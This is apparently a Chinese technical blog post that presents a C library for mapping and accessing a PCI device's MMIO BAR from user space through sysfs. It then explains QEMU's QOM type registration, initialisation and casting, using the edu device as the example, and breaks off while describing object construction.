1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t *bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char *bdf_or_path, char *resource_txt, size_t txt_sz, char *dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char *slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; if (strstr (resource_txt, "/resource" ) && resource_txt[strlen (resource_txt)-1 ] >= '0' && resource_txt[strlen (resource_txt)-1 ] <= '9' ) { snprintf (resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar (const char *resource_txt, int bar_idx, unsigned long long *start, unsigned long long *end, unsigned long long *flags, int *picked_idx) { FILE *fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s=0 , e=0 , f=0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char *bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start=0 , end=0 , flags=0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void *map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void *mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void *p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off,1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); }uint16_t mmio_read16 (size_t off) { if (chk(off,2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); }uint32_t mmio_read32 (size_t off) { if (chk(off,4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); }uint64_t mmio_read64 (size_t off) { if (chk(off,8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); }void mmio_write8 (size_t off, uint8_t v) { if (chk(off,1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; }void mmio_write16 (size_t off, uint16_t v) { if (chk(off,2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; }void mmio_write32 (size_t off, uint32_t v) { if (chk(off,4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; }void mmio_write64 (size_t off, uint64_t v) { if (chk(off,8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; }volatile void *mmio_ptr (size_t off) { if (chk(off,1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); }
数据结构 1 2 3 4 5 6 7 8 9 10 11 12 13 14 typedef struct { volatile uint8_t *bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ;
说明 :g_mmio 为内部全局上下文,API 都在此单实例上操作。
初始化与释放 int mmio_init(const char *bdf_or_path, int bar_idx);
void mmio_fini(void);
功能 :解除映射、关闭 fd,清空 g_mmio。
注意 :调用后,任何读写/查询接口都不再有效。
查询接口 1 2 3 4 5 6 volatile void *mmio_base (void ) ; size_t mmio_size (void ) ; int mmio_bar_index (void ) ; uint64_t mmio_phys_base (void ) ; uint64_t mmio_phys_limit (void ) ;
提示 :mmio_base() 返回的是进程虚拟地址 ;mmio_phys_base() 返回设备物理地址 。
地址换算 uint64_t mmio_offset_to_phys(size_t off);
功能 :把映射内偏移 换算为设备物理地址 。
公式 :phys = phys_start + off
边界 :off < g_mmio.size;否则置 errno=ERANGE 并返回 0。
uint64_t mmio_virt_to_phys(const void *p);
功能 :把映射内某虚拟指针 换算为设备物理地址 。
公式 :phys = phys_start + ((uintptr_t)p - (uintptr_t)bar)
边界 :p 必须位于 [bar, bar + size);否则置 errno=EINVAL 并返回 0。
注意 :这些 “物理地址” 指的是 CPU 物理地址空间中的 MMIO 区间 (BAR),不是 设备 DMA 侧地址。若系统启用 IOMMU,设备做 DMA 看到的是设备地址 ,与此不同。
寄存器访问 1 2 3 4 5 6 7 8 9 10 11 uint8_t mmio_read8 (size_t off) ;uint16_t mmio_read16 (size_t off) ;uint32_t mmio_read32 (size_t off) ;uint64_t mmio_read64 (size_t off) ;void mmio_write8 (size_t off, uint8_t v) ;void mmio_write16 (size_t off, uint16_t v) ;void mmio_write32 (size_t off, uint32_t v) ;void mmio_write64 (size_t off, uint64_t v) ;volatile void *mmio_ptr (size_t off) ;
入参 :off 是寄存器偏移 (相对于 BAR 起点),要求 off + width <= size。
返回/行为 :
读函数在越界时返回 0 并设置 errno=ERANGE。
写函数在越界时不执行写入 。
mmio_ptr(off) 返回 bar + off 的直接指针 (volatile),越界返回 NULL。
端序 :PCI/PC 常见为小端 寄存器布局;上面函数按本机字节序单纯取/存(在小端主机上与寄存器端序一致)。如目标为大端或寄存器定义为特定端序,需在调用处处理端序。
对齐 :建议按天然宽度对齐访问(例如 32 位寄存器用 mmio_read32/write32 且 off%4==0),避免未对齐访问带来的架构差异。
返回值与错误处理
使用示例:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 #include <stdio.h> #include <inttypes.h> int main () { if (mmio_init("0000:00:04.0" , 0 ) != 0 ) { perror("mmio_init" ); return 1 ; } printf ("VA base = %p\n" , mmio_base()); printf ("PA base = 0x%016" PRIx64 "\n" , mmio_phys_base()); printf ("PA end = 0x%016" PRIx64 " (size=%zu)\n" , mmio_phys_limit(), mmio_size()); size_t off = 0x100 ; uint32_t v = mmio_read32(off); printf ("READ32[0x%zx] = 0x%08x\n" , off, v); mmio_write32(off, v | 0x1 ); printf ("PA(off=0x%zx) = 0x%016" PRIx64 "\n" , off, mmio_offset_to_phys(off)); volatile void *p = mmio_ptr(0x200 ); printf ("PA(ptr=%p) = 0x%016" PRIx64 "\n" , (void *)p, mmio_virt_to_phys((void *)p)); mmio_fini(); return 0 ; }
QEMU Object Model QEMU Object Model(QOM)就是 QEMU 在 C 语言 里自建的一套“面向对象”系统,用来统一建模和管理模拟中的一切东西(CPU、总线、设备、内存、机器等)。它提供类型系统、继承/接口、对象树、属性、以及设备生命周期(realize/unrealize)等机制,让设备能被配置、热插拔、迁移,并能被 QMP/HMP 进行自省(introspection)。
Type :概念上的“类定义”。在源码里先写一个 TypeInfo 常量描述它;注册后在运行期对应一个 **TypeImpl**(内部表示,放到全局哈希表里)。
Class :某个类型的类对象 (保存“虚函数表”等静态行为),类型初始化后得到一个 ObjectClass 实例。
Object :某个类型的实例对象 ,动态分配的 **Object**(或其派生,比如 DeviceState 内含的 Object 头)。
Property :对象/类对外暴露的属性访问器 (getter/setter 或指向子对象/链接),用于命令行与 QMP 自省。
classDiagram
direction LR
class TypeInfo {
+const char* name
+const char* parent
+size_t instance_size
+size_t instance_align
+void (*instance_init)(Object*)
+void (*instance_post_init)(Object*)
+void (*instance_finalize)(Object*)
+bool abstract
+size_t class_size
+void (*class_init)(ObjectClass*, const void*)
+void (*class_base_init)(ObjectClass*, const void*)
+const void* class_data
+InterfaceInfo[] interfaces
}
class TypeImpl {
+const char* name
+size_t class_size
+size_t instance_size
+size_t instance_align
+void (*class_init)(ObjectClass*, const void*)
+void (*class_base_init)(ObjectClass*, const void*)
+const void* class_data
+void (*instance_init)(Object*)
+void (*instance_post_init)(Object*)
+void (*instance_finalize)(Object*)
+bool abstract
+const char* parent
+TypeImpl* parent_type
+ObjectClass* class %% 单例 class 对象
+int num_interfaces
+InterfaceImpl interfaces[*]
}
class ObjectClass {
+Type type %% 指回本类的 TypeImpl
+GSList* interfaces %% InterfaceClass 列表(按类挂载)
+const char* object_cast_cache[4]
+const char* class_cast_cache[4]
+ObjectUnparent* unparent
+GHashTable* properties
}
class Object {
+ObjectClass* class %% 指向所属类
+ObjectFree* free
+GHashTable* properties
+uint32_t ref
+Object* parent
}
class InterfaceInfo {
+const char* type %% 接口类型名(注册时声明)
}
class InterfaceImpl {
+const char* typename %% 运行时保存的接口名
}
class InterfaceClass {
<>
+ObjectClass parent_class
+Type interface_type %% 指向接口自身的 TypeImpl
}
%% 关系
TypeInfo --> TypeImpl : type_register_static()
TypeImpl --> TypeImpl : parent_type
TypeImpl *-- ObjectClass : class (singleton)
Object --> ObjectClass : class
ObjectClass --> TypeImpl : type
TypeInfo --> InterfaceInfo : interfaces
TypeImpl --> InterfaceImpl : interfaces
InterfaceClass --|> ObjectClass : subclass
ObjectClass o-- "0..*" InterfaceClass : interfaces (per-class)
InterfaceClass --> TypeImpl : interface_type
QOM整个运作包括3个部分,即类型的注册、类型的初始化以及对象的初始化。
类型的注册 TypeInfo 这一结构体用来定义一个「类」的基本属性,该结构体定义于 include/qom/object.h 当中:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 struct TypeInfo { const char *name; const char *parent; size_t instance_size; void (*instance_init)(Object *obj); void (*instance_post_init)(Object *obj); void (*instance_finalize)(Object *obj); bool abstract; size_t class_size; void (*class_init)(ObjectClass *klass, void *data); void (*class_base_init)(ObjectClass *klass, void *data); void *class_data; InterfaceInfo *interfaces; };
以 hw/misc/edu.c 文件为例,当我们在 Qemu 中要定义一个「类」的时候,我们实际上需要定义一个 TypeInfo 类型的变量。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void pci_edu_register_types (void ) { static InterfaceInfo interfaces[] = { { INTERFACE_CONVENTIONAL_PCI_DEVICE }, { }, }; static const TypeInfo edu_info = { .name = TYPE_PCI_EDU_DEVICE, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (EduState), .instance_init = edu_instance_init, .class_init = edu_class_init, .interfaces = interfaces, }; type_register_static(&edu_info); } type_init(pci_edu_register_types)
可以看到各个 QOM 类型最终通过函数 register_module_init 注册到了系统,其中 function 是每个类型都需要实现的初始化函数,type 表示是 MODULE_INIT_QOM 。
这里的 constructor 是编译器属性,编译器会把带有这个属性的函数 do_qemu_init_ ##function 放到特殊的段中,带有这个属性的函数会早于 main 函数执行,也就是说所有的 QOM 类型注册在 main 执行之前就已经执行了。
1 2 3 4 5 6 7 #define module_init(function, type) \ static void __attribute__((constructor)) do_qemu_init_ ## function(void) \ { \ register_module_init(function, type); \ } #define type_init(function) module_init(function, MODULE_INIT_QOM)
register_module_init 及相关函数代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 void register_module_init (void (*fn)(void ), module_init_type type) { ModuleEntry *e; ModuleTypeList *l; e = g_malloc0(sizeof (*e)); e->init = fn; e->type = type; l = find_type(type); QTAILQ_INSERT_TAIL(l, e, node); }
register_module_init 函数以类型的初始化函数以及所属类型(对 QOM 类型来说是 MODULE_INIT_QOM )构建出一个 ModuleEntry,然后插入到对应 module 所属的链表中,所有 module 的链表存放在一个 init_type_list 数组中。
进入 main 函数后不久就以 MODULE_INIT_QOM 为参数调用了函数 module_call_init。
1 2 3 int main (int argc, char **argv, char **envp) qemu_init (argc, argv, envp) ; module_call_init(MODULE_INIT_QOM);
这个函数执行了 init_type_list[MODULE_INIT_QOM] 链表上每一个 ModuleEntry 的 init 函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 void module_call_init (module_init_type type) { ModuleTypeList *l; ModuleEntry *e; if (modules_init_done[type]) { return ; } l = find_type(type); QTAILQ_FOREACH(e, l, node) { e->init(); } modules_init_done[type] = true ; }
以 edu 设备为例,该类型的 init 函数是 pci_edu_register_types,该函数唯一的工作是构造了一个 TypeInfo 类型的 edu_info,并将其作为参数调用 type_register_static,type_register_static 调用 type_register,最终到达了 type_register_internal,核心工作在这一函数中进行。
type_register_internal 函数很简单,type_new 函数首先通过一个 TypeInfo 结构构造出一个 TypeImpl,type_table_add 则将这个 TypeImpl 加入到一个哈希表中。这个哈希表的 key 是 TypeImpl 的名字,value 为 TypeImpl 本身的值。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 static TypeImpl *type_new (const TypeInfo *info) { TypeImpl *ti = g_malloc0(sizeof (*ti)); int i; g_assert(info->name != NULL ); if (type_table_lookup(info->name) != NULL ) { fprintf (stderr , "Registering `%s' which already exists\n" , info->name); abort (); } ti->name = g_strdup(info->name); ti->parent = g_strdup(info->parent); ti->class_size = info->class_size; ti->instance_size = info->instance_size; ti->class_init = info->class_init; ti->class_base_init = info->class_base_init; ti->class_data = info->class_data; ti->instance_init = info->instance_init; ti->instance_post_init = info->instance_post_init; ti->instance_finalize = info->instance_finalize; ti->abstract = info->abstract; for (i = 0 ; info->interfaces && info->interfaces[i].type; i++) { ti->interfaces[i].typename = g_strdup(info->interfaces[i].type); } ti->num_interfaces = i; return ti; } static GHashTable *type_table_get (void ) { static GHashTable *type_table; if (type_table == NULL ) { type_table = g_hash_table_new(g_str_hash, g_str_equal); } return type_table; } static void type_table_add (TypeImpl *ti) { assert(!enumerating_types); g_hash_table_insert(type_table_get(), (void *)ti->name, ti); } static TypeImpl *type_register_internal (const TypeInfo *info) { TypeImpl *ti; ti = type_new(info); type_table_add(ti); return ti; }
TypeImpl 中存放了类型的所有信息,其定义如下。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 struct TypeImpl { const char *name; size_t class_size; size_t instance_size; void (*class_init)(ObjectClass *klass, void *data); void (*class_base_init)(ObjectClass *klass, void *data); void *class_data; void (*instance_init)(Object *obj); void (*instance_post_init)(Object *obj); void (*instance_finalize)(Object *obj); bool abstract; const char *parent; TypeImpl *parent_type; ObjectClass *class ; int num_interfaces; InterfaceImpl interfaces[MAX_INTERFACES]; };
类型的初始化 类的初始化是通过 type_initialize 函数完成的,这个函数并不长,函数的输入是表示类型信息的 TypeImpl 类型 ti。函数首先判断了 ti->class 是否存在,如果不为空就表示这个类型已经初始化过了,直接返回。
1 2 3 if (ti->class) { return ; }
后面主要做了三件事:
第一件事是设置相关的 filed,比如 class_size 和 instance_size,使用 ti->class_size 分配一个 ObjectClass。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ti->class_size = type_class_get_size(ti); ti->instance_size = type_object_get_size(ti); if (ti->instance_size == 0 ) { ti->abstract = true ; } if (type_is_ancestor(ti, type_interface)) { assert(ti->instance_size == 0 ); assert(ti->abstract); assert(!ti->instance_init); assert(!ti->instance_post_init); assert(!ti->instance_finalize); assert(!ti->num_interfaces); } ti->class = g_malloc0(ti->class_size);
第二件事就是初始化所有父类类型,不仅包括实际的类型,也包括接口这种抽象类型。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 parent = type_get_parent(ti); if (parent) { type_initialize(parent); GSList *e; int i; g_assert(parent->class_size <= ti->class_size); g_assert(parent->instance_size <= ti->instance_size); memcpy (ti->class, parent->class, parent->class_size); ti->class -> interfaces = NULL ; ti->class -> properties = g_hash_table_new_full( g_str_hash, g_str_equal, NULL , object_property_free); for (e = parent->class->interfaces; e; e = e->next) { InterfaceClass *iface = e->data; ObjectClass *klass = OBJECT_CLASS(iface); type_initialize_interface(ti, iface->interface_type, klass->type); } for (i = 0 ; i < ti->num_interfaces; i++) { TypeImpl *t = type_get_by_name(ti->interfaces[i].typename); if (!t) { error_report("missing interface '%s' for object '%s'" , ti->interfaces[i].typename, parent->name); abort (); } for (e = ti->class->interfaces; e; e = e->next) { TypeImpl *target_type = OBJECT_CLASS(e->data)->type; if (type_is_ancestor(target_type, t)) { break ; } } if (e) { continue ; } type_initialize_interface(ti, t, t); } } else { ti->class->properties = g_hash_table_new_full( g_str_hash, g_str_equal, NULL , object_property_free); } ti->class -> type = ti;
第三件事就是依次调用所有父类的 class_base_init 以及自己的 class_init,这也和 C++ 很类似,在初始化一个对象的时候会依次调用所有父类的构造函数。这里是调用了父类型的 class_base_init 函数。
按祖先链自下而上依次调用各祖先的 class_base_init;
只调用本类的 class_init(祖先的 class_init 在祖先初始化时已经调用过了)。
1 2 3 4 5 6 7 8 9 10 while (parent) { if (parent->class_base_init) { parent->class_base_init(ti->class, ti->class_data); } parent = type_get_parent(parent); } if (ti->class_init) { ti->class_init(ti->class, ti->class_data); }
实际上 type_initialize 函数可以在很多地方调用,不过,只有在第一次调用的时候会进行初始化,之后的调用会由于 ti->class 不为空而直接返回。
下面以其中一条路径来看 type_initialize 函数的调用过程。假设在启动 QEMU 虚拟机的时候不指定 machine 参数,那 QEMU 会在 main 函数中调用 select_machine,进而由 find_default_machine 函数来找默认的 machine 类型。在那个函数之前,会调用 object_class_get_list 来得到所有 TYPE_MACHINE 类型组成的链表。
1 2 3 4 int main (int argc, char **argv, char **envp) > machine_class = select_machine(); > GSList *machines = object_class_get_list(TYPE_MACHINE, false ); > MachineClass *machine_class = find_default_machine(machines);
object_class_get_list 会调用 object_class_foreach,后者会对 type_table 中所有类型调用 object_class_foreach_tramp 函数,在该函数中会调用 type_initialize 函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 GSList *object_class_get_list (const char *implements_type, bool include_abstract) { GSList *list = NULL ; object_class_foreach(object_class_get_list_tramp, implements_type, include_abstract, &list ); return list ; } void object_class_foreach (void (*fn)(ObjectClass *klass, void *opaque), const char *implements_type, bool include_abstract, void *opaque) { OCFData data = { fn, implements_type, include_abstract, opaque }; enumerating_types = true ; g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data); enumerating_types = false ; } static void object_class_foreach_tramp (gpointer key, gpointer value, gpointer opaque) { OCFData *data = opaque; TypeImpl *type = value; ObjectClass *k; type_initialize(type); k = type->class; if (!data->include_abstract && type->abstract) { return ; } if (data->implements_type && !object_class_dynamic_cast(k, data->implements_type)) { return ; } data->fn(k, data->opaque); }
类型的层次结构 在 edu 这个设备的类型信息里(edu_info),有个 parent 字段,写着它的父类型是谁。
对 edu 来说,父类型是 TYPE_PCI_DEVICE。而 TYPE_PCI_DEVICE 的父类型是 TYPE_DEVICE,再往上是 TYPE_OBJECT。换句话说,类型继承链是:TYPE_OBJECT → TYPE_DEVICE → TYPE_PCI_DEVICE → edu。
QEMU 的所有类型都挂在这棵以 TYPE_OBJECT 为根的树上。
初始化类型时(type_initialize),QEMU 会给“类对象”(class)分配内存,这个“类对象”并不是 C++ 的 class,但作用很像:它保存了某个类型的“方法表/元数据”(回调函数、标识字段等)。
1 ti->class = g_malloc0(ti->class_size);
class_size 决定了这个“类对象”到底长啥样(也就是用哪种结构体)。如果当前类型没自己指定 class_size,就沿用父类型的 class_size。
在 edu 设备的类型信息 edu_info 结构中有一个 parent 成员,这就指定了 edu_info 的父类型的名称,通过分析源码可知继承关系为 TYPE_PCI_DEVICE->TYPE_DEVICE->TYPE_OBJECT。总体上,QEMU 使用的类型一起构成了以 TYPE_OBJECT 为根的树。
1 2 3 4 5 6 7 8 static const TypeInfo edu_info = { .name = TYPE_PCI_EDU_DEVICE, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof(EduState), .instance_init = edu_instance_init, .class_init = edu_class_init, .interfaces = interfaces, };
edu 类型没有定义自己的 class_size,所以直接继承父类型 TYPE_PCI_DEVICE 的 class_size。父类型的类结构体就是 PCIDeviceClass,因此 edu 的类对象类型也就是 PCIDeviceClass(里面包含 realize/exit/config_read/config_write 等回调,以及 vendor/device/class 等标识字段)。
在类型的初始化函数 type_initialize 中会调用 ti->class=g_malloc0(ti->class_size) 语句来分配类型的 class 结构,这个结构实际上代表了类型的信息。类似于 C++ 定义的一个类,从前面的分析看到 ti->class_size 为 TypeImpl 中的值,如果类型本身没有定义就会使用父类型的 class_size 进行初始化。edu 设备中的类型本身没有定义,所以它的 class_size 为 TYPE_PCI_DEVICE 中定义的值,即 sizeof(PCIDeviceClass)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 typedef struct PCIDeviceClass { DeviceClass parent_class; void (*realize)(PCIDevice *dev, Error **errp); PCIUnregisterFunc *exit ; PCIConfigReadFunc *config_read; PCIConfigWriteFunc *config_write; uint16_t vendor_id; uint16_t device_id; uint8_t revision; uint16_t class_id; uint16_t subsystem_vendor_id; uint16_t subsystem_id; bool is_bridge; const char *romfile; } PCIDeviceClass;
PCIDeviceClass 表明了类属 PCI 设备的一些信息,如表示设备商信息的 vendor_id 和设备信息 device_id 以及读取 PCI 设备配置空间的 config_read 和 config_write 函数。值得注意的是,一个域是第一个成员 DeviceClass 的结构体,这描述的是属于“设备类型”的类型所具有的一些属性。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 struct ObjectClass { Type type; GSList *interfaces; const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE]; const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE]; ObjectUnparent *unparent; GHashTable *properties; }; typedef struct DeviceClass { ObjectClass parent_class; ... }
DeviceClass 定义了设备类型相关的基本信息以及基本的回调函数,第一个域也是表示其父类型的 Class,为 ObjectClass 。 ObjectClass 是所有类型的基础,会内嵌到对应的其他 Class 的第一个域中。
在 type_initialize 中会调用以下代码来对父类型所占的这部分空间进行初始化。
1 2 3 4 5 6 7 8 9 10 parent = type_get_parent(ti); if (parent) { memcpy (ti->class, parent->class, parent->class_size); } if (ti->class_init) { ti->class_init(ti->class, ti->class_data); }
对于 edu 设备来说这里的 class_init 为 edu_class_init。
1 2 3 4 5 6 7 8 9 10 11 12 13 static void edu_class_init (ObjectClass *class, void *data) { DeviceClass *dc = DEVICE_CLASS(class); PCIDeviceClass *k = PCI_DEVICE_CLASS(class); k->realize = pci_edu_realize; k->exit = pci_edu_uninit; k->vendor_id = PCI_VENDOR_ID_QEMU; k->device_id = 0x11e8 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; set_bit(DEVICE_CATEGORY_MISC, dc->categories); }
类型转换 DEVICE_CLASS 和 PCI_DEVICE_CLASS 最终调用的函数为 object_class_dynamic_cast 。
函数首先通过 type_get_by_name 得到要转到的 TypeImpl,这里的 typename 是 TYPE_PCI_DEVICE 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 ObjectClass *object_class_dynamic_cast (ObjectClass *class, const char *typename) { ObjectClass *ret = NULL ; TypeImpl *target_type; TypeImpl *type; if (!class) { return NULL ; } type = class->type; if (type->name == typename) { return class; } target_type = type_get_by_name(typename); if (!target_type) { return NULL ; } if (type->class->interfaces && type_is_ancestor(target_type, type_interface)) { int found = 0 ; GSList *i; for (i = class->interfaces; i; i = i->next) { ObjectClass *target_class = i->data; if (type_is_ancestor(target_class->type, target_type)) { ret = target_class; found++; } } if (found > 1 ) { ret = NULL ; } } else if (type_is_ancestor(type, target_type)) { ret = class; } return ret; }
以 edu 为例,type->name 是 edu,但是要转换到的却是 TYPE_PCI_DEVICE,所以会调用 type_is_ancestor("edu",TYPE_PCI_DEVICE) 来判断后者是否是前者的祖先。
在该函数中依次得到 edu 的父类型,然后判断是否与 TYPE_PCI_DEVICE 相等,由 edu 设备的 TypeInfo 可知其父类型为 TYPE_PCI_DEVICE,所以这个 type_is_ancestor 会成功,能够进行从 ObjectClass 到 PCIDeviceClass 的转换。这样就可以直接通过 (PCIDeviceClass*)ObjectClass 完成从 ObjectClass 到 PCIDeviceClass 的强制转换。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 static bool type_is_ancestor (TypeImpl *type, TypeImpl *target_type) { assert(target_type); while (type) { if (type == target_type) { return true ; } type = type_get_parent(type); } return false ; } static TypeImpl *type_get_parent (TypeImpl *type) { if (!type->parent_type && type->parent) { type->parent_type = type_get_by_name(type->parent); if (!type->parent_type) { fprintf (stderr , "Type '%s' is missing its parent '%s'\n" , type->name, type->parent); abort (); } } return type->parent_type; }
对象的构造与初始化 前面提到,首先每个类型指定一个 TypeInfo 注册到系统中,接着在系统运行初始化的时候会把 TypeInfo 转变成 TypeImple 放到一个哈希表中,这就是类型的注册。系统会对这个哈希表中的每一个类型进行初始化,主要是设置 TypeImpl 的一些域以及调用类型的 class_init 函数,这就是类型的初始化。现在系统中已经有了所有类型的信息并且这些类型的初始化函数已经调用了,接着会根据需要(如 QEMU 命令行指定的参数)创建对应的实例对象,也就是各个类型的 object 。
下面来分析指定 -device edu 命令的情况。在 main 函数中有这么一句话。
1 2 qemu_opts_foreach(qemu_find_opts("device" ), device_init_func, NULL , &error_fatal);
对每一个 -device 的参数,会调用 device_init_func 函数,该函数随即调用 qdev_device_add 进行设备的添加。通过 object_new 来构造对象,其调用链如下。
